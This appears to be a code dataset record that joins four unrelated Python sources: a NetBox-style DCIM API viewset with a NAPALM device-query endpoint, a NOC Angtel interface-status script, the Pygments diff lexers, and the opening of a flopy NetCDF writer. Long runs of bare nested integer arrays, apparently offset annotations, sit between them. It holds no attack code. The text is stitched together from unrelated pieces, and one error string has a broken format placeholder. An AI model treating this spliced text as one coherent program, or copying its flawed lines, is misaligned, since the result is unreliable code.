def graphs(self, request, pk):
"""
A convenience method for rendering graphs for a particular Device.
"""
device = get_object_or_404(Device, pk=pk)
queryset = Graph.objects.filter(type__model='device')
serializer = RenderedGraphSerializer(queryset, many=True, context={'graphed_object': device})
return Response(serializer.data)
@swagger_auto_schema(
manual_parameters=[
Parameter(
name='method',
in_='query',
required=True,
type=openapi.TYPE_STRING
)
],
responses={'200': serializers.DeviceNAPALMSerializer}
)
@action(detail=True, url_path='napalm')
def napalm(self, request, pk):
"""
Execute a NAPALM method on a Device
"""
device = get_object_or_404(Device, pk=pk)
if not device.primary_ip:
raise ServiceUnavailable("This device does not have a primary IP address configured.")
if device.platform is None:
raise ServiceUnavailable("No platform is configured for this device.")
if not device.platform.napalm_driver:
raise ServiceUnavailable("No NAPALM driver is configured for this device's platform ().".format(
device.platform
))
# Check that NAPALM is installed
try:
import napalm
from napalm.base.exceptions import ModuleImportError
except ImportError:
raise ServiceUnavailable("NAPALM is not installed. Please see the documentation for instructions.")
# Validate the configured driver
try:
driver = napalm.get_network_driver(device.platform.napalm_driver)
except ModuleImportError:
raise ServiceUnavailable("NAPALM driver for platform {} not found: {}.".format(
device.platform, device.platform.napalm_driver
))
# Verify user permission
if not request.user.has_perm('dcim.napalm_read'):
return HttpResponseForbidden()
# Connect to the device
napalm_methods = request.GET.getlist('method')
response = OrderedDict([(m, None) for m in napalm_methods])
ip_address = str(device.primary_ip.address.ip)
username = settings.NAPALM_USERNAME
password = settings.NAPALM_PASSWORD
optional_args = settings.NAPALM_ARGS.copy()
if device.platform.napalm_args is not None:
optional_args.update(device.platform.napalm_args)
# Update NAPALM parameters according to the request headers
for header in request.headers:
if header[:9].lower() != 'x-napalm-':
continue
key = header[9:]
if key.lower() == 'username':
username = request.headers[header]
elif key.lower() == 'password':
password = request.headers[header]
elif key:
optional_args[key.lower()] = request.headers[header]
d = driver(
hostname=ip_address,
username=username,
password=password,
timeout=settings.NAPALM_TIMEOUT,
optional_args=optional_args
)
try:
d.open()
except Exception as e:
raise ServiceUnavailable("Error connecting to the device at {}: {}".format(ip_address, e))
# Validate and execute each specified NAPALM method
for method in napalm_methods:
if not hasattr(driver, method):
response[method] = {'error': 'Unknown NAPALM method'}
continue
if not method.startswith('get_'):
response[method] = {'error': 'Only get_* NAPALM methods are supported'}
continue
try:
response[method] = getattr(d, method)()
except NotImplementedError:
response[method] = {'error': 'Method {} not implemented for NAPALM driver {}'.format(method, driver)}
except Exception as e:
response[method] = {'error': 'Method {} failed: {}'.format(method, e)}
d.close()
return Response(response)
#
# Device components
#
class ConsolePortViewSet(CableTraceMixin, ModelViewSet):
queryset = ConsolePort.objects.prefetch_related('device', 'connected_endpoint__device', 'cable', 'tags')
serializer_class = serializers.ConsolePortSerializer
filterset_class = filters.ConsolePortFilterSet
class ConsoleServerPortViewSet(CableTraceMixin, ModelViewSet):
queryset = ConsoleServerPort.objects.prefetch_related('device', 'connected_endpoint__device', 'cable', 'tags')
serializer_class = serializers.ConsoleServerPortSerializer
filterset_class = filters.ConsoleServerPortFilterSet
class PowerPortViewSet(CableTraceMixin, ModelViewSet):
queryset = PowerPort.objects.prefetch_related(
'device', '_connected_poweroutlet__device', '_connected_powerfeed', 'cable', 'tags'
)
serializer_class = serializers.PowerPortSerializer
filterset_class = filters.PowerPortFilterSet
class PowerOutletViewSet(CableTraceMixin, ModelViewSet):
queryset = PowerOutlet.objects.prefetch_related('device', 'connected_endpoint__device', 'cable', 'tags')
serializer_class = serializers.PowerOutletSerializer
filterset_class = filters.PowerOutletFilterSet
class InterfaceViewSet(CableTraceMixin, ModelViewSet):
queryset = Interface.objects.prefetch_related(
'device', '_connected_interface', '_connected_circuittermination', 'cable', 'ip_addresses', 'tags'
).filter(
device__isnull=False
)
serializer_class = serializers.InterfaceSerializer
filterset_class = filters.InterfaceFilterSet
@action(detail=True)
def graphs(self, request, pk):
"""
A convenience method for rendering graphs for a particular interface.
"""
interface = get_object_or_404(Interface, pk=pk)
queryset = Graph.objects.filter(type__model='interface')
serializer = RenderedGraphSerializer(queryset, many=True, context={'graphed_object': interface})
return Response(serializer.data)
class FrontPortViewSet(CableTraceMixin, ModelViewSet):
queryset = FrontPort.objects.prefetch_related('device__device_type__manufacturer', 'rear_port', 'cable', 'tags')
serializer_class = serializers.FrontPortSerializer
filterset_class = filters.FrontPortFilterSet
class RearPortViewSet(CableTraceMixin, ModelViewSet):
queryset = RearPort.objects.prefetch_related('device__device_type__manufacturer', 'cable', 'tags')
serializer_class = serializers.RearPortSerializer
filterset_class = filters.RearPortFilterSet
class DeviceBayViewSet(ModelViewSet):
queryset = DeviceBay.objects.prefetch_related('installed_device').prefetch_related('tags')
serializer_class = serializers.DeviceBaySerializer
filterset_class = filters.DeviceBayFilterSet
class InventoryItemViewSet(ModelViewSet):
queryset = InventoryItem.objects.prefetch_related('device', 'manufacturer').prefetch_related('tags')
serializer_class = serializers.InventoryItemSerializer
filterset_class = filters.InventoryItemFilterSet
#
# Connections
#
class ConsoleConnectionViewSet(ListModelMixin, GenericViewSet):
queryset = ConsolePort.objects.prefetch_related(
'device', 'connected_endpoint__device'
).filter(
connected_endpoint__isnull=False
)
serializer_class = serializers.ConsolePortSerializer
filterset_class = filters.ConsoleConnectionFilterSet
class PowerConnectionViewSet(ListModelMixin, GenericViewSet):
queryset = PowerPort.objects.prefetch_related(
'device', 'connected_endpoint__device'
).filter(
_connected_poweroutlet__isnull=False
)
serializer_class = serializers.PowerPortSerializer
filterset_class = filters.PowerConnectionFilterSet
class InterfaceConnectionViewSet(ListModelMixin, GenericViewSet):
queryset = Interface.objects.prefetch_related(
'device', '_connected_interface__device'
).filter(
# Avoid duplicate connections by only selecting the lower PK in a connected pair
_connected_interface__isnull=False,
pk__lt=F('_connected_interface')
)
serializer_class = serializers.InterfaceConnectionSerializer
filterset_class = filters.InterfaceConnectionFilterSet
#
# Cables
#
class CableViewSet(ModelViewSet):
queryset = Cable.objects.prefetch_related(
'termination_a', 'termination_b'
)
serializer_class = serializers.CableSerializer
filterset_class = filters.CableFilterSet
#
# Virtual chassis
#
class VirtualChassisViewSet(ModelViewSet):
queryset = VirtualChassis.objects.prefetch_related('tags').annotate(
member_count=Count('members')
)
serializer_class = serializers.VirtualChassisSerializer
filterset_class = filters.VirtualChassisFilterSet
#
# Power panels
#
class PowerPanelViewSet(ModelViewSet):
queryset = PowerPanel.objects.prefetch_related(
'site', 'rack_group'
).annotate(
powerfeed_count=Count('powerfeeds')
)
serializer_class = serializers.PowerPanelSerializer
filterset_class = filters.PowerPanelFilterSet
#
# Power feeds
#
class PowerFeedViewSet(CustomFieldModelViewSet):
queryset = PowerFeed.objects.prefetch_related('power_panel', 'rack', 'tags')
serializer_class = serializers.PowerFeedSerializer
filterset_class = filters.PowerFeedFilterSet
#
# Miscellaneous
#
class ConnectedDeviceViewSet(ViewSet):
"""
This endpoint allows a user to determine what device (if any) is connected to a given peer device and peer
interface. This is useful in a situation where a device boots with no configuration, but can detect its neighbors
via a protocol such as LLDP. Two query parameters must be included in the request:
* `peer_device`: The name of the peer device
* `peer_interface`: The name of the peer interface
"""
permission_classes = [IsAuthenticatedOrLoginNotRequired]
_device_param = Parameter(
name='peer_device',
in_='query',
description='The name of the peer device',
required=True,
type=openapi.TYPE_STRING
)
_interface_param = Parameter(
name='peer_interface',
in_='query',
description='The name of the peer interface',
required=True,
type=openapi.TYPE_STRING
)
def get_view_name(self):
return "Connected Device Locator"
@swagger_auto_schema(
manual_parameters=[_device_param, _interface_param],
responses={'200': serializers.DeviceSerializer}
)
def list(self, request):
peer_device_name = request.query_params.get(self._device_param.name)
peer_interface_name = request.query_params.get(self._interface_param.name)
if not peer_device_name or not peer_interface_name:
raise MissingFilterException(detail='Request must include "peer_device" and "peer_interface" filters.')
# Determine local interface from peer interface's connection
peer_interface = get_object_or_404(Interface, device__name=peer_device_name, name=peer_interface_name)
local_interface = peer_interface._connected_interface
if local_interface is None:
return Response()
return Response(serializers.DeviceSerializer(local_interface.device, context={'request': request}).data)
| [
[
[
24,
35
],
[
13978,
13989
]
],
[
[
61,
69
],
[
14101,
14109
],
[
14145,
14153
],
[
14194,
14202
],
[
14964,
14972
]
],
[
[
99,
104
],
[
2760,
2765
],
[
4025,
4030
],
[
4268,
4273
],
[
7727,
7732
],
[
20619,
20624
],
[
20938,
20943
]
],
[
[
106,
107
],
[
20061,
20062
]
],
[
[
132,
153
],
[
13847,
13868
]
],
[
[
155,
167
],
[
5918,
5930
]
],
[
[
197,
214
],
[
1823,
1840
],
[
3647,
3664
],
[
5165,
5182
],
[
11920,
11937
],
[
12626,
12643
],
[
17748,
17765
],
[
22964,
22981
]
],
[
[
236,
243
],
[
12349,
12356
],
[
22052,
22059
],
[
22254,
22261
]
],
[
[
273,
282
],
[
12226,
12235
],
[
21905,
21914
],
[
22101,
22110
]
],
[
[
310,
329
],
[
4781,
4800
],
[
12165,
12184
],
[
22358,
22377
]
],
[
[
368,
374
],
[
1598,
1604
],
[
3480,
3486
],
[
4954,
4960
],
[
11749,
11755
],
[
12467,
12473
],
[
17571,
17577
]
],
[
[
409,
423
],
[
19086,
19100
],
[
19425,
19439
],
[
19766,
19780
]
],
[
[
460,
468
],
[
2634,
2642
],
[
3853,
3861
],
[
5340,
5348
],
[
12133,
12141
],
[
15991,
15999
],
[
17969,
17977
],
[
23168,
23176
],
[
23195,
23203
]
],
[
[
505,
519
],
[
19102,
19116
],
[
19441,
19455
],
[
19782,
19796
]
],
[
[
521,
528
],
[
21377,
21384
]
],
[
[
558,
565
],
[
3266,
3273
]
],
[
[
583,
590
],
[
2855,
2862
],
[
3452,
3459
],
[
4123,
4130
],
[
4365,
4372
],
[
4753,
4760
],
[
6949,
6956
],
[
7502,
7509
],
[
7830,
7837
],
[
8114,
8121
],
[
8395,
8402
],
[
8658,
8665
],
[
8919,
8926
],
[
9176,
9183
],
[
9431,
9438
],
[
9683,
9690
],
[
9937,
9944
],
[
10285,
10292
],
[
10618,
10625
],
[
10986,
10993
],
[
16282,
16289
],
[
16576,
16583
],
[
16894,
16901
],
[
17168,
17175
],
[
17538,
17545
],
[
18246,
18253
],
[
18508,
18515
],
[
18746,
18753
],
[
19003,
19010
],
[
19359,
19366
],
[
19698,
19705
],
[
20180,
20187
],
[
20434,
20441
],
[
20724,
20731
],
[
21042,
21049
],
[
21298,
21305
]
],
[
[
621,
626
],
[
20282,
20287
]
],
[
[
628,
639
],
[
16109,
16120
],
[
19134,
19145
]
],
[
[
641,
660
],
[
7953,
7972
]
],
[
[
662,
679
],
[
16391,
16408
]
],
[
[
681,
706
],
[
8222,
8247
]
],
[
[
708,
714
],
[
3069,
3075
],
[
4602,
4608
],
[
10111,
10117
],
[
10445,
10451
],
[
10722,
10728
],
[
11938,
11944
],
[
12644,
12650
]
],
[
[
716,
725
],
[
18589,
18598
]
],
[
[
731,
748
],
[
9780,
9797
]
],
[
[
750,
760
],
[
10048,
10058
]
],
[
[
762,
772
],
[
7252,
7262
],
[
7619,
7629
]
],
[
[
774,
783
],
[
18067,
18076
]
],
[
[
785,
802
],
[
9274,
9291
]
],
[
[
804,
813
],
[
17269,
17278
],
[
19814,
19823
],
[
17766,
17775
],
[
22982,
22991
]
],
[
[
815,
832
],
[
9019,
9036
]
],
[
[
838,
850
],
[
7183,
7195
]
],
[
[
852,
865
],
[
7322,
7335
],
[
18832,
18845
]
],
[
[
867,
875
],
[
7390,
7398
],
[
10384,
10392
]
],
[
[
877,
886
],
[
4656,
4665
],
[
21155,
21164
]
],
[
[
888,
899
],
[
16995,
17006
]
],
[
[
901,
920
],
[
8758,
8777
]
],
[
[
922,
932
],
[
20832,
20842
]
],
[
[
934,
943
],
[
16683,
16692
],
[
19473,
19482
]
],
[
[
949,
966
],
[
8501,
8518
]
],
[
[
968,
972
],
[
3118,
3122
],
[
4465,
4469
],
[
5183,
5187
]
],
[
[
974,
983
],
[
3953,
3962
]
],
[
[
985,
1000
],
[
6799,
6814
]
],
[
[
1002,
1010
],
[
4222,
4230
]
],
[
[
1012,
1020
],
[
18344,
18352
]
],
[
[
1022,
1038
],
[
9528,
9544
]
],
[
[
1040,
1046
],
[
2716,
2722
]
],
[
[
1048,
1052
],
[
2953,
2957
],
[
3665,
3669
]
],
[
[
1058,
1072
],
[
20540,
20554
]
],
[
[
1111,
1134
],
[
3759,
3782
],
[
12036,
12059
],
[
17870,
17893
]
],
[
[
1164,
1187
],
[
2912,
2935
],
[
4424,
4447
],
[
7578,
7601
],
[
10681,
10704
],
[
21114,
21137
]
],
[
[
1214,
1219
],
[
3697,
3702
],
[
11972,
11977
],
[
17803,
17808
]
],
[
[
1244,
1250
],
[
3167,
3173
]
],
[
[
1252,
1256
],
[
3216,
3220
]
],
[
[
1289,
1313
],
[
2045,
2069
],
[
2411,
2435
]
],
[
[
1315,
1348
],
[
21850,
21883
]
],
[
[
1350,
1362
],
[
2686,
2698
],
[
3923,
3935
],
[
4192,
4204
],
[
6769,
6781
],
[
7153,
7165
],
[
7923,
7935
],
[
8192,
8204
],
[
8471,
8483
],
[
8728,
8740
],
[
8989,
9001
],
[
9244,
9256
],
[
9498,
9510
],
[
9750,
9762
],
[
10018,
10030
],
[
10354,
10366
],
[
16079,
16091
],
[
16361,
16373
],
[
16653,
16665
],
[
16965,
16977
],
[
17239,
17251
],
[
18037,
18049
],
[
18314,
18326
],
[
18559,
18571
],
[
18802,
18814
],
[
20252,
20264
],
[
20510,
20522
],
[
20802,
20814
]
],
[
[
1364,
1382
],
[
12711,
12729
],
[
12846,
12864
],
[
12975,
12993
],
[
13305,
13323
],
[
13584,
13602
],
[
15122,
15140
]
],
[
[
1414,
1426
],
[
3056,
3068
],
[
3105,
3117
],
[
3154,
3166
],
[
3203,
3215
],
[
3253,
3265
],
[
3327,
3339
],
[
4589,
4601
],
[
4643,
4655
],
[
7239,
7251
],
[
7309,
7321
],
[
7377,
7389
],
[
10098,
10110
],
[
10164,
10176
],
[
10432,
10444
],
[
10495,
10507
]
],
[
[
1461,
1475
],
[
3340,
3354
],
[
10177,
10191
],
[
10508,
10522
]
],
[
[
1490,
1501
],
[
2804,
2815
],
[
3403,
3414
],
[
4069,
4080
],
[
4312,
4323
],
[
4704,
4715
],
[
4826,
4837
],
[
4895,
4906
],
[
6889,
6900
],
[
7445,
7456
],
[
7775,
7786
],
[
8050,
8061
],
[
8325,
8336
],
[
8596,
8607
],
[
8855,
8866
],
[
9114,
9125
],
[
9369,
9380
],
[
9622,
9633
],
[
9875,
9886
],
[
10230,
10241
],
[
10565,
10576
],
[
12420,
12431
],
[
16226,
16237
],
[
16514,
16525
],
[
16840,
16851
],
[
17112,
17123
],
[
17484,
17495
],
[
18192,
18203
],
[
18455,
18466
],
[
18692,
18703
],
[
18945,
18956
],
[
19303,
19314
],
[
19644,
19655
],
[
20116,
20127
],
[
20384,
20395
],
[
20665,
20676
],
[
20987,
20998
],
[
21244,
21255
],
[
22466,
22477
],
[
2225,
2236
],
[
5217,
5228
],
[
6567,
6578
],
[
11523,
11534
],
[
11652,
11663
],
[
11697,
11708
],
[
23204,
23215
]
],
[
[
1526,
1548
],
[
22771,
22793
]
],
[
[
1567,
1582
],
[
16062,
16077
],
[
16344,
16359
],
[
16636,
16651
],
[
16948,
16963
],
[
17222,
17237
],
[
18020,
18035
],
[
18297,
18312
]
],
[
[
2672,
2685
]
],
[
[
2900,
2911
]
],
[
[
3906,
3922
]
],
[
[
4176,
4191
]
],
[
[
4412,
4423
]
],
[
[
6746,
6768
]
],
[
[
7133,
7152
]
],
[
[
7560,
7577
]
],
[
[
7896,
7922
]
],
[
[
8159,
8191
]
],
[
[
8446,
8470
]
],
[
[
8701,
8727
]
],
[
[
8964,
8988
]
],
[
[
9219,
9243
]
],
[
[
9474,
9497
]
],
[
[
9725,
9749
]
],
[
[
10000,
10017
]
],
[
[
10338,
10353
]
],
[
[
10667,
10680
]
],
[
[
16043,
16061
]
],
[
[
16319,
16343
]
],
[
[
16619,
16635
]
],
[
[
16929,
16947
]
],
[
[
17205,
17221
]
],
[
[
18003,
18019
]
],
[
[
18281,
18296
]
],
[
[
18542,
18558
]
],
[
[
18781,
18801
]
],
[
[
19061,
19085
]
],
[
[
19402,
19424
]
],
[
[
19739,
19765
]
],
[
[
20239,
20251
]
],
[
[
20488,
20509
]
],
[
[
20784,
20801
]
],
[
[
21097,
21113
]
],
[
[
21354,
21376
]
]
] |
# ---------------------------------------------------------------------
# Angtel.Topaz.get_interface_status
# ---------------------------------------------------------------------
# Copyright (C) 2007-2019 The NOC Project
# See LICENSE for details
# ---------------------------------------------------------------------
# Python modules
import re
# NOC modules
from noc.core.script.base import BaseScript
from noc.sa.interfaces.igetinterfacestatus import IGetInterfaceStatus
class Script(BaseScript):
name = "Angtel.Topaz.get_interface_status"
interface = IGetInterfaceStatus
cache = True
rx_port = re.compile(
r"^(?P<port>(?:Fa|Gi|Te|Po)\S+)\s+\S+\s+\S+\s+\S+\s+\S+\s+\S+\s+"
r"(?P<oper_status>Up|Down|Not Present)",
re.MULTILINE | re.IGNORECASE,
)
def execute_cli(self, interface=None):
r = []
v = self.cli("show interfaces status", cached=True)
for match in self.rx_port.finditer(v):
if (interface is not None) and (interface == match.group("port")):
return [
{"interface": match.group("port"), "status": match.group("oper_status") == "Up"}
]
r += [{"interface": match.group("port"), "status": match.group("oper_status") == "Up"}]
return r
| [
[
[
345,
347
],
[
620,
622
],
[
763,
765
],
[
778,
780
]
],
[
[
396,
406
],
[
492,
502
]
],
[
[
457,
476
],
[
568,
587
]
],
[
[
485,
491
]
]
] |
# -*- coding: utf-8 -*-
"""
pygments.lexers.diff
~~~~~~~~~~~~~~~~~~~~
Lexers for diff/patch formats.
:copyright: Copyright 2006-2017 by the Pygments team, see AUTHORS.
:license: BSD, see LICENSE for details.
"""
import re
from pygments.lexer import RegexLexer, include, bygroups
from pygments.token import Text, Comment, Operator, Keyword, Name, Generic, \
Literal
__all__ = ['DiffLexer', 'DarcsPatchLexer', 'WDiffLexer']
class DiffLexer(RegexLexer):
"""
Lexer for unified or context-style diffs or patches.
"""
name = 'Diff'
aliases = ['diff', 'udiff']
filenames = ['*.diff', '*.patch']
mimetypes = ['text/x-diff', 'text/x-patch']
tokens = {
'root': [
(r' .*\n', Text),
(r'\+.*\n', Generic.Inserted),
(r'-.*\n', Generic.Deleted),
(r'!.*\n', Generic.Strong),
(r'@.*\n', Generic.Subheading),
(r'([Ii]ndex|diff).*\n', Generic.Heading),
(r'=.*\n', Generic.Heading),
(r'.*\n', Text),
]
}
def analyse_text(text):
if text[:7] == 'Index: ':
return True
if text[:5] == 'diff ':
return True
if text[:4] == '--- ':
return 0.9
class DarcsPatchLexer(RegexLexer):
"""
DarcsPatchLexer is a lexer for the various versions of the darcs patch
format. Examples of this format are derived by commands such as
``darcs annotate --patch`` and ``darcs send``.
.. versionadded:: 0.10
"""
name = 'Darcs Patch'
aliases = ['dpatch']
filenames = ['*.dpatch', '*.darcspatch']
DPATCH_KEYWORDS = ('hunk', 'addfile', 'adddir', 'rmfile', 'rmdir', 'move',
'replace')
tokens = {
'root': [
(r'<', Operator),
(r'>', Operator),
(r'\{', Operator),
(r'\}', Operator),
(r'(\[)((?:TAG )?)(.*)(\n)(.*)(\*\*)(\d+)(\s?)(\])',
bygroups(Operator, Keyword, Name, Text, Name, Operator,
Literal.Date, Text, Operator)),
(r'(\[)((?:TAG )?)(.*)(\n)(.*)(\*\*)(\d+)(\s?)',
bygroups(Operator, Keyword, Name, Text, Name, Operator,
Literal.Date, Text), 'comment'),
(r'New patches:', Generic.Heading),
(r'Context:', Generic.Heading),
(r'Patch bundle hash:', Generic.Heading),
(r'(\s*)(%s)(.*\n)' % '|'.join(DPATCH_KEYWORDS),
bygroups(Text, Keyword, Text)),
(r'\+', Generic.Inserted, "insert"),
(r'-', Generic.Deleted, "delete"),
(r'.*\n', Text),
],
'comment': [
(r'[^\]].*\n', Comment),
(r'\]', Operator, "#pop"),
],
'specialText': [ # darcs add [_CODE_] special operators for clarity
(r'\n', Text, "#pop"), # line-based
(r'\[_[^_]*_]', Operator),
],
'insert': [
include('specialText'),
(r'\[', Generic.Inserted),
(r'[^\n\[]+', Generic.Inserted),
],
'delete': [
include('specialText'),
(r'\[', Generic.Deleted),
(r'[^\n\[]+', Generic.Deleted),
],
}
class WDiffLexer(RegexLexer):
"""
A `wdiff <https://www.gnu.org/software/wdiff/>`_ lexer.
Note that:
* only to normal output (without option like -l).
* if target files of wdiff contain "[-", "-]", "{+", "+}",
especially they are unbalanced, this lexer will get confusing.
.. versionadded:: 2.2
"""
name = 'WDiff'
aliases = ['wdiff']
filenames = ['*.wdiff']
mimetypes = []
flags = re.MULTILINE | re.DOTALL
# We can only assume "[-" after "[-" before "-]" is `nested`,
# for instance wdiff to wdiff outputs. We have no way to
# distinct these marker is of wdiff output from original text.
ins_op = r"\{\+"
ins_cl = r"\+\}"
del_op = r"\[\-"
del_cl = r"\-\]"
normal = r'[^{}[\]+-]+' # for performance
tokens = {
'root': [
(ins_op, Generic.Inserted, 'inserted'),
(del_op, Generic.Deleted, 'deleted'),
(normal, Text),
(r'.', Text),
],
'inserted': [
(ins_op, Generic.Inserted, '#push'),
(del_op, Generic.Inserted, '#push'),
(del_cl, Generic.Inserted, '#pop'),
(ins_cl, Generic.Inserted, '#pop'),
(normal, Generic.Inserted),
(r'.', Generic.Inserted),
],
'deleted': [
(del_op, Generic.Deleted, '#push'),
(ins_op, Generic.Deleted, '#push'),
(ins_cl, Generic.Deleted, '#pop'),
(del_cl, Generic.Deleted, '#pop'),
(normal, Generic.Deleted),
(r'.', Generic.Deleted),
],
}
| [
[
[
242,
244
],
[
3710,
3712
],
[
3725,
3727
]
],
[
[
273,
283
],
[
469,
479
],
[
1286,
1296
],
[
3287,
3297
]
],
[
[
285,
292
],
[
2994,
3001
],
[
3145,
3152
]
],
[
[
294,
302
],
[
1982,
1990
],
[
2166,
2174
],
[
2500,
2508
]
],
[
[
330,
334
],
[
749,
753
],
[
1042,
1046
],
[
2016,
2020
],
[
2074,
2078
],
[
2200,
2204
],
[
2258,
2262
],
[
2509,
2513
],
[
2524,
2528
],
[
2650,
2654
],
[
2883,
2887
],
[
4218,
4222
],
[
4244,
4248
]
],
[
[
336,
343
],
[
2716,
2723
]
],
[
[
345,
353
],
[
1801,
1809
],
[
1831,
1839
],
[
1862,
1870
],
[
1893,
1901
],
[
1991,
1999
],
[
2028,
2036
],
[
2080,
2088
],
[
2175,
2183
],
[
2212,
2220
],
[
2746,
2754
],
[
2940,
2948
]
],
[
[
355,
362
],
[
2001,
2008
],
[
2185,
2192
],
[
2515,
2522
]
],
[
[
364,
368
],
[
2010,
2014
],
[
2022,
2026
],
[
2194,
2198
],
[
2206,
2210
]
],
[
[
370,
377
],
[
780,
787
],
[
822,
829
],
[
863,
870
],
[
903,
910
],
[
961,
968
],
[
1002,
1009
],
[
2307,
2314
],
[
2351,
2358
],
[
2405,
2412
],
[
2552,
2559
],
[
2600,
2607
],
[
3038,
3045
],
[
3083,
3090
],
[
3189,
3196
],
[
3233,
3240
],
[
4116,
4123
],
[
4168,
4175
],
[
4305,
4312
],
[
4354,
4361
],
[
4403,
4410
],
[
4452,
4459
],
[
4500,
4507
],
[
4538,
4545
],
[
4610,
4617
],
[
4658,
4665
],
[
4706,
4713
],
[
4754,
4761
],
[
4801,
4808
],
[
4838,
4845
]
],
[
[
385,
392
],
[
2060,
2067
],
[
2244,
2251
]
],
[
[
394,
401
]
],
[
[
459,
468
]
],
[
[
1270,
1285
]
],
[
[
3276,
3286
]
]
] |
from disco import Disco
class Config:
def __init__(self):
self._numero_discos = int(input("\nInforme a quantidade de discos: "))
def adiciona_discos(self, torre_inicial):
discos = self.add_disco()
for ix in range(self._numero_discos):
torre_inicial.empilha(discos[ix])
def add_disco(self):
discos = []
arquivo = open('disco.txt', 'r')
for linha in arquivo:
discos.append(Disco(int(linha)))
return discos
def numero_discos(self):
return self._numero_discos
def status_torres(self, torres):
print('\nNumero de discos: ' + str(self._numero_discos))
for torre in torres:
torre.to_string()
| [
[
[
18,
23
],
[
460,
465
]
],
[
[
31,
37
]
]
] |
import os
import platform
import socket
import copy
import json
import numpy as np
from datetime import datetime
import time
from .metadata import acdd
import flopy
# globals
FILLVALUE = -99999.9
ITMUNI = {
0: "undefined",
1: "seconds",
2: "minutes",
3: "hours",
4: "days",
5: "years",
}
PRECISION_STRS = ["f4", "f8", "i4"]
STANDARD_VARS = ["longitude", "latitude", "layer", "elevation", "time"]
path = os.path.split(__file__)[0]
with open(path + "/longnames.json") as f:
NC_LONG_NAMES = json.load(f)
class Logger(object):
"""
Basic class for logging events during the linear analysis calculations
if filename is passed, then an file handle is opened
Parameters
----------
filename : bool or string
if string, it is the log file to write. If a bool, then log is
written to the screen. echo (bool): a flag to force screen output
Attributes
----------
items : dict
tracks when something is started. If a log entry is
not in items, then it is treated as a new entry with the string
being the key and the datetime as the value. If a log entry is
in items, then the end time and delta time are written and
the item is popped from the keys
"""
def __init__(self, filename, echo=False):
self.items = {}
self.echo = bool(echo)
if filename == True:
self.echo = True
self.filename = None
elif filename:
self.f = open(filename, "w", 0) # unbuffered
self.t = datetime.now()
self.log("opening " + str(filename) + " for logging")
else:
self.filename = None
def log(self, phrase):
"""
log something that happened
Parameters
----------
phrase : str
the thing that happened
"""
pass
t = datetime.now()
if phrase in self.items.keys():
s = (
str(t)
+ " finished: "
+ str(phrase)
+ ", took: "
+ str(t - self.items[phrase])
+ "\n"
)
if self.echo:
print(s,)
if self.filename:
self.f.write(s)
self.items.pop(phrase)
else:
s = str(t) + " starting: " + str(phrase) + "\n"
if self.echo:
print(s,)
if self.filename:
self.f.write(s)
self.items[phrase] = copy.deepcopy(t)
def warn(self, message):
"""
Write a warning to the log file
Parameters
----------
message : str
the warning text
"""
s = str(datetime.now()) + " WARNING: " + message + "\n"
if self.echo:
print(s,)
if self.filename:
self.f.write(s)
return
class NetCdf(object):
"""
Support for writing a netCDF4 compliant file from a flopy model
Parameters
----------
output_filename : str
Name of the .nc file to write
model : flopy model instance
time_values : the entries for the time dimension
if not None, the constructor will initialize
the file. If None, the perlen array of ModflowDis
will be used
z_positive : str ('up' or 'down')
Positive direction of vertical coordinates written to NetCDF file.
(default 'down')
verbose : if True, stdout is verbose. If str, then a log file
is written to the verbose file
forgive : what to do if a duplicate variable name is being created. If
True, then the newly requested var is skipped. If False, then
an exception is raised.
**kwargs : keyword arguments
modelgrid : flopy.discretization.Grid instance
user supplied model grid which will be used in lieu of the model
object modelgrid for netcdf production
Notes
-----
This class relies heavily on the grid and modeltime objects,
including these attributes: lenuni, itmuni, start_datetime, and proj4.
Make sure these attributes have meaningful values.
"""
def __init__(
self,
output_filename,
model,
time_values=None,
z_positive="up",
verbose=None,
prj=None,
logger=None,
forgive=False,
**kwargs
):
assert output_filename.lower().endswith(".nc")
if verbose is None:
verbose = model.verbose
if logger is not None:
self.logger = logger
else:
self.logger = Logger(verbose)
self.var_attr_dict = {}
self.log = self.logger.log
if os.path.exists(output_filename):
self.logger.warn("removing existing nc file: " + output_filename)
os.remove(output_filename)
self.output_filename = output_filename
self.forgive = bool(forgive)
self.model = model
self.model_grid = model.modelgrid
if "modelgrid" in kwargs:
self.model_grid = kwargs.pop("modelgrid")
self.model_time = model.modeltime
if prj is not None:
self.model_grid.proj4 = prj
if self.model_grid.grid_type == "structured":
self.dimension_names = ("layer", "y", "x")
STANDARD_VARS.extend(["delc", "delr"])
# elif self.model_grid.grid_type == 'vertex':
# self.dimension_names = ('layer', 'ncpl')
else:
raise Exception(
"Grid type {} not supported.".format(self.model_grid.grid_type)
)
self.shape = self.model_grid.shape
try:
import dateutil.parser
except:
print(
"python-dateutil is not installed\n"
+ "try pip install python-dateutil"
)
return
self.start_datetime = self._dt_str(
dateutil.parser.parse(self.model_time.start_datetime)
)
self.logger.warn("start datetime:{0}".format(str(self.start_datetime)))
proj4_str = self.model_grid.proj4
if proj4_str is None:
proj4_str = "epsg:4326"
self.log(
"Warning: model has no coordinate reference system specified. "
"Using default proj4 string: {}".format(proj4_str)
)
self.proj4_str = proj4_str
self.grid_units = self.model_grid.units
self.z_positive = z_positive
if self.grid_units is None:
self.grid_units = "undefined"
assert self.grid_units in ["feet", "meters", "undefined"], (
"unsupported length units: " + self.grid_units
)
self.time_units = self.model_time.time_units
# this gives us confidence that every NetCdf instance
# has the same attributes
self.log("initializing attributes")
self._initialize_attributes()
self.log("initializing attributes")
self.time_values_arg = time_values
self.log("initializing file")
self.initialize_file(time_values=self.time_values_arg)
self.log("initializing file")
def __add__(self, other):
new_net = NetCdf.zeros_like(self)
if np.isscalar(other) or isinstance(other, np.ndarray):
for vname in self.var_attr_dict.keys():
new_net.nc.variables[vname][:] = (
self.nc.variables[vname][:] + other
)
elif isinstance(other, NetCdf):
for vname in self.var_attr_dict.keys():
new_net.nc.variables[vname][:] = (
self.nc.variables[vname][:] + other.nc.variables[vname][:]
)
else:
raise Exception(
"NetCdf.__add__(): unrecognized other:{0}".format(
str(type(other))
)
)
return new_net
def __sub__(self, other):
new_net = NetCdf.zeros_like(self)
if np.isscalar(other) or isinstance(other, np.ndarray):
for vname in self.var_attr_dict.keys():
new_net.nc.variables[vname][:] = (
self.nc.variables[vname][:] - other
)
elif isinstance(other, NetCdf):
for vname in self.var_attr_dict.keys():
new_net.nc.variables[vname][:] = (
self.nc.variables[vname][:] - other.nc.variables[vname][:]
)
else:
raise Exception(
"NetCdf.__sub__(): unrecognized other:{0}".format(
str(type(other))
)
)
return new_net
def __mul__(self, other):
new_net = NetCdf.zeros_like(self)
if np.isscalar(other) or isinstance(other, np.ndarray):
